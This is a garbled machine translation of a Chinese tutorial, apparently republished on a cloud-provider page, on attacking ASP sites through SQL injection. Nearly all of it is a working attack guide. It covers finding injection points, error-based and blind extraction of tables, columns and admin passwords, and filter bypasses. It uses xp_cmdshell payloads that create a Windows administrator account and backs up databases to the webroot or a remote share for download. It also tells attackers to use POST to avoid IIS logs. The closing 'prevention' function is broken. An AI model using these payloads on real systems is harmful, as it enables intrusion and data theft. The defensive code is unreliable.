Getting Started: Full access to SQL injection vulnerabilities

Source: Internet
Author: User
Tags filter functions iis net command sql injection sql server injection table name variable
Secure SQL injection is accessed from the normal WWW port, and the surface appears to be no different from the general Web page access, so the current firewall does not alarm SQL injection, if the administrator does not see the IIS log habits, may be invaded for a long time will not find.

However, SQL injection is quite flexible and can be a lot of surprises when injected. Can be based on the specific situation analysis, the construction of clever SQL statements, so that the successful acquisition of data, is the master and "rookie" the fundamental difference.

According to national conditions, the domestic web site with asp+access or SQL Server accounted for more than 70%, php+mysq accounted for l20%, the other less than 10%. In this article, we from the introduction, advanced to high-level explanation of ASP injection methods and skills, PHP injection of the article by the NB Alliance, another friend Zwell writing, hope for security workers and programmers are useful. Understand the ASP injection of friends also please do not skip the introductory article, because some people to inject the basic method of judgment there are still misunderstanding. Are you ready, everyone? Let ' s go ...

Introductory articles

If you have not tried SQL injection before, then the first step is to remove the check in front of the => tool =>internet option => advanced => display friendly HTTP error message. Otherwise, no matter what error the server returns, IE only displays as an HTTP 500 server error and cannot get more information.

The first section, the principle of SQL injection

The following we start from a website (Note: This article was published prior to the station webmaster consent, most of the real data).

On the homepage of the website, it is known as "IE can not open a new window of a variety of solutions" link, Address:, We add single quotes after this address, and the server returns the following error message:

Microsoft JET Database Engine error ' 80040e14 '

The syntax error of the string is in the query expression ' id=49 '.

/showdetail.asp, line 8

From this error we can see the following points:

1. The Web site uses an Access database that connects to the database through the jet engine, rather than through ODBC.

2. The procedure does not determine whether the data submitted by the client meets the procedural requirements.

3. The SQL statement queries the table for a field that is an ID.

From the example above, we can see that the principle of SQL injection is to submit special code from the client to collect the information of the program and server, so as to obtain the information you think of.

Section II, to determine whether SQL injection

After reading the first section, some people will feel: I also often this test can inject, this is not very simple? In fact, this is not the best way, why?

First of all, not necessarily every server's IIS return specific error prompts to the client, if the program added CInt (parameters), such as statements, SQL injection will not be successful, but the server will also complain, the specific message to deal with the URL when the server error. Please contact your system administrator.

Second, some programmers who have some knowledge of SQL injection think it's safe to filter out single quotes, which is not a small number, and if you test with single quotes, you won't get the injection point.

So, what kind of test method is more accurate? The answer is as follows: and 1=1 and 1=2

This is the classic 1=1, 1=2 test method, how to judge? Check out the results of the three URLs above:

The performance that can be injected:

① Normal display (this is inevitable, otherwise it is the error of the program)
② normal display, the content is basically the same as ①
③ prompts BOF or EOF (the program does not make any judgments), or prompts cannot find the record (when the rs.eof is judged), or the display content is empty (the program added on Error Resume Next)

Not to inject is easier to judge, ① also normal display, ② and ③ generally have program-defined error prompts, or prompt type conversion error.

Of course, this is only the incoming parameter is a digital time to use the method of judgment, the actual application will have character and search parameters, I will be in the middle of the "SQL injection general steps" to do the analysis.

Section III, Judgment of database types and injection methods

There are differences in the functions and injection methods of different databases, so we have to judge the type of database before we inject it. The most commonly used database for ASP is access and SQL Server, with over 99% Web sites on the web being one of them.

How do you let the program tell you what database it uses? To see:

SQL Server has some system variables that can be retrieved directly from the error message if the servers IIS prompts are not turned off and SQL Server returns an error: and User>0

This statement is simple, but it contains the essence of SQL Server-specific injection methods, and I myself found this highly efficient method of guessing in an unintentional test. Let me see what it means: first, the preceding statement is normal, with emphasis on and user>0, and we know that user is a built-in variable of SQL Server whose value is the current connected username and the type is nvarchar. With a nvarchar value of 0 compared to the number of int, the system will first attempt to convert the value of nvarchar to an int, of course, the process will certainly be wrong, SQL Server error prompt is: The nvarchar value "ABC" Conversion data type int A syntax error occurred in the column, hehe, ABC is the value of the variable user, so, do not waste Chuihuizhili get the database username. In a future space, you will see a lot of statements in this way.

Incidentally, as we all know, SQL Server's user SA is a role equivalent to adminstrators permissions, and with SA privileges, it is almost certain that the host's administrator can be obtained. The above method can easily test whether to log on with an SA, and note that if the SA is logged in, the hint is that the column that converts "dbo" to int has an error instead of "sa".

If server IIS does not allow you to return error prompts, how do you determine the database type? We can start with access and SQL Server and the differences, access and SQL Server have their own system tables, such as tables that hold all the objects in the database, access is in the system table [msysobjects], but reading the table in the Web environment prompts the No permissions ", SQL Server is in table [sysobjects] and is readable in the web environment.

With the confirmation that you can inject it, use the following statement: and (SELECT COUNT (*) from sysobjects) >0 and (SELECT COUNT (*) from msysobjects) >0

If the database is SQL Server, the page of the first URL is roughly the same as the original page , and the second URL, Because cannot find the table msysobjects, will prompt the error, even if the program has the fault-tolerant processing, the page also and the original page is completely different.

If the database is using access, then the situation is different, the first URL of the page and the original page is completely distinct; the second URL, depending on whether the database settings are allowed to read the system table, is generally not allowed, so and the original URL is completely different. In most cases, you can use the first URL to know the type of database used by the system, and the second URL will only be validated when the IIS error prompts are turned on.

Next, we'll continue to learn how to get what we want from the database, first of all, let's look at the general steps of SQL injection:

The first section, the general steps of SQL injection

First of all, judge the environment, look for the injection point, and judge the database type, which is already mentioned in the introductory article.

Secondly, according to the type of injection parameter, the original of the SQL statement is reconstructed in the mind, according to the type of parameter, it is divided into the following three kinds:

(A) The parameters of id=49 such injections are numeric, and the SQL statements are as follows:

Select * from table name where field =49

The injected parameter is id=49 and [query condition], that is, the build statement:

Select * from table name where field =49 and [query criteria]

(B) class= series The parameters of such injections are character types, and the original SQL statements are roughly as follows:

Select * from table name where field = ' Soap series '

The injected parameters are the class= series ' and [query conditions] and ' = ', that is, the generated statement:

Select * from table name where field = ' serials ' and [query conditions] and ' = '

(C) When the search does not filter the parameters, such as the keyword= keyword, the original SQL statement is roughly as follows:

Select * from table name where field like '% keyword% '

The injected parameter is keyword= ' and [query condition] and '%25 ' =, that is, the build statement:

Select * from table name where field like '% ' and [query condition] and '% ' = '% '

Next, replace the query condition with the SQL statement, guessing the table name, for example:

Id=49 and (Select Count (*) from Admin) >=0

If the page is the same as the id=49, the attached condition is set, that is, the table admin exists, otherwise, that is not present (please remember this method). This loops until the table name is guessed.

When the table name is guessed, replace count (*) with count (field name) and use the same principle to guess the field name.

Some people will say: There are some accidental ingredients, if the table name is very complicated and irregular, it is no longer play. That's right, the world doesn't exist. 100% successful hacker technology, flies do not ding seamless eggs, no matter how sophisticated the hackers, are due to other people's procedures are not strictly written or user confidentiality awareness is not enough to get a hand.

A bit off the topic, in other words, for SQL Server library, there are ways to let the program tell us the table name and field name, we will do in the advanced article introduction.

Finally, after the table name and the name of the column are successfully guessed, then use the SQL statement to get the value of the field, the following describes a most common method-ascii verbatim decoding method, although this method is slow, but certainly a feasible method.

For example, we know that there are username fields in table admin, first we take the first record and test the length: and (select 1 len (username) from Admin) >0

First explain the principle: if the top 1 username length is greater than 0, then the condition is set; then it is 1, > 2, >3 this test, until the condition is not established, such as >7 established, >8 is not established, is Len (username) =8

Of course, no one will be stupid from 0,1,2,3 a test, how to compare quickly to see their own play. After the length of the username is obtained, the nth character is intercepted with mid (username,n,1), and ASC (mid username,n,1) gets the ASCII code, for example:

Id=49 and (select top 1 ASC (mid username,1,1) from Admin) >0

It is also used to gradually narrow the range of the 1th character of the ASCII code, note that the English and the number of ASCII between 1-128, you can use the binary method to accelerate guessing, if written in the program test, efficiency will be greatly improved.

section II, SQL injection common functions

People with a basic SQL language have a much higher success rate in SQL injection than people who are unfamiliar. We need to improve our SQL level, especially some common functions and commands.

ACCESS:ASC (character) Sqlserver:unicode (character)

Function: Returns the ASCII code of a character

ACCESS:CHR (digital) Sqlserver:nchar (digital)

function: Contrary to ASC, returns characters based on ASCII code

Access:mid (String, n,l) sqlserver:substring (string, n,l)

Function: Returns a substring of the string from N-character length L, that is, the string between N and N+l

ACCESS:ABC (digital) sqlserver:abc (digital)

Function: Returns the absolute value of a number (used when guessing Chinese characters)

Access:a between B and C sqlserver:a between B and C

Function: To determine whether a is bounded between B and C

Section III, Chinese processing methods

Encountered in the injection of Chinese characters is often the case, some people encounter Chinese characters will want to retreat. In fact, as long as the Chinese code has some understanding, "Chinese phobia" can soon be overcome.

First of all, a little common sense:

In Access, the ASCII code in Chinese may be negative, take out the negative and use ABS () to get the absolute value, the Chinese characters will not change.

SQL Server, Chinese ASCII is a positive number, but because it is Unicode dual-digit encoding, can not use function ASCII () to obtain the ASCII code, you must use the function Unicode () to return the Unicode value, and then use the NCHAR function to get the corresponding Chinese characters.

After understanding the above two points, is not that the Chinese guess solution is actually similar to English? In addition to the use of functions to be aware of, guess the scope of a larger point, the method is no different.

After reading the introductory and advanced chapter, a little practice, crack the general website is no problem. But if you hit the list name, or the program author filters some special characters, how to improve the success rate of injection? How to improve the efficiency of guessing? Please keep looking at the advanced article.

Section one, using system tables to inject SQL Server databases

SQL Server is a powerful database system, and the operating system is also closely linked, which gives developers a great convenience, but on the other hand, also provides a springboard for the injector, we first look at a few specific examples:

http://Site/url.asp?id=1;exec master. xp_cmdshell "NET user name Password/add"--

semicolon; In SQL Server, the two-and-right statements are represented--the following statements are comments, so this statement is divided into two sentences in SQL Server, first select the Id=1 record, and then execute the stored procedure xp_cmdshell, This stored procedure is used to invoke system commands, so the net command creates a new account for Windows with user name name, password password, and then:

http://Site/url.asp?id=1;exec master. xp_cmdshell "net localgroup name Administrators/add"--

Add the new account name to the Administrators group, and you will have the highest privileges in the system without two minutes! Of course, this method only applies if the database is connected with an SA, otherwise there is no permission to invoke xp_cmdshell.

http://Site/url.asp?id=1 ;; and db_name () >0

There is a similar example and user>0, which is to get the connection user name, Db_name () is another system variable, and returns the database name of the connection.

http://Site/url.asp?id=1;backup database name to disk= ' c:\inetpub\wwwroot\1.db ';--

This is quite a trick, from ③ to get the database name, plus some IIS error exposed the absolute path, the database back to the Web directory, and then the entire database with HTTP to complete the download back, all the admin and user password are glance! When you do not know the absolute path, you can also back up to the network address of the method (such as \\202.96.xx.xx\Share\1.db), but the success rate is not high.

http://Site/url.asp?id=1 ;; and (Select top 1 name from sysobjects where xtype= ' U ' and status>0) >0

As mentioned earlier, sysobjects is a SQL Server system table that stores all the table names, views, constraints, and other objects, xtype= ' U ' and status>0, the name of the table that the user creates, and the above statement takes the first table name out and compares it to 0. Let the error message expose the table name. Second, the third table name how to get? or leave it to our smart readers to think about it.

http://Site/url.asp?id=1 ;; and (Select top 1 col_name (object_id (' table name '), 1) from sysobjects) >0

After you get the table name from ⑤, use object_id (' table name ') to get the internal id,col_name (table name id,1) of the table name to represent the 1th field name of the table, and replace 1 with 2,3,4 ... you can get the name of the field in the puzzle sheet one by one.

The above 6 points is that I study SQL Server injection more than six months since the painstaking crystallization, you can see that the understanding of SQL Server, directly affect the success rate and guess the speed of the solution. After I studied SQL Server injection, my level in development has also been greatly improved, oh, maybe Security and development is complementary to it.

Section II, bypass program restrictions continue to inject

In the introductory article, there are many people who like to use the ' number test ' to inject holes, so there are also a lot of people using the filter ' number ' method to "prevent" injection vulnerabilities, which may be able to block some beginners attack, but the SQL injection more familiar people, or can use the relevant functions, to circumvent the program restrictions.

In the "General Steps for SQL Injection" section, the statements I use are optimized so that they do not contain single quotes; in the "inject SQL Server database with system tables," some statements contain ' numbers ', and let's take an example to see how these statements are modified:

Simple as where xtype= ' U ', the character U corresponds to the ASCII code is 85, so you can use where Xtype=char (85) Instead, if the character is in Chinese, such as where name= ' user ', you can use where Name=nchar ( 29992) +nchar (25143) instead.

Section III, Summary of experience

1. Some people will filter the SELECT, Update, delete these keywords, but forget the case is case-sensitive, so you can use Select to try this.

2. If you can't guess the field name, look at the login form on the Web site, generally for convenience, the field name and form of the input box to take the same names.

3. Special note: The Address bar of the + code after the introduction of the program is interpreted as a space,%2b interpreted as the + number,%25 interpreted as%, specific reference to the UrlEncode of the relevant introduction.

4. When injected with the Get method, IIS records all of your commit strings and does not record the Post method, so you can use the Post URL as much as possible without the get.

5. The interpretation of Access can only use ASCII verbatim decoding method, SQL Server can also use this method, only need the difference between the two, but if you can use SQL Server error information to expose the value, that efficiency and accuracy rate will be greatly improved.

Prevention methods

SQL injection vulnerabilities can be described as "sink, Shan", which is very common on the web, usually because programmers don't understand the injection, or if the program is not filtered strictly, or if a parameter forgets to be checked. Here, I give you a function, instead of the request function in ASP, you can inject say NO to all SQL, the function is as follows:

Function Saferequest (Paraname,paratype)
'---incoming parameters---
' Paraname: Parameter name-character type
' Paratype: Parameter Type-numeric (1 indicates that the above parameter is a number, and 0 indicates that the above parameter is a character)

Dim Paravalue
Paravalue=request (Paraname)
If Paratype=1 Then
If not IsNumeric (paravalue) Then
Response.Write "Parameter" & Paraname & must be a numeric type! "
End If
Paravalue=replace (Paravalue, "'", "" ")
End If
End Function

This is the end of the article, whether you are a security person, a technology enthusiast or a programmer, I hope this article will help you.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.